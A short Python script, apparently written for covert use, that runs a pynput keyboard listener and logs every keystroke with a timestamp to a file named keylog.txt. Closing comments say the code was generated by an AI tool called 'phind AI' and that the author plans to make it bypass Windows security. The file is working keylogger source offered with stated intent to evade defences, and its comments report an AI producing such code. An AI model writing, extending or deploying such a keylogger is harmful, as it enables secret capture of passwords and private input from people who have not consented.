import keyboard
from pynput.keyboard import Key, Listener
import logging

# Set the file name and logging level
log_file = "keylog.txt"
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

# the above code is generated by phind AI
# I will try to make it bypass windows security with following code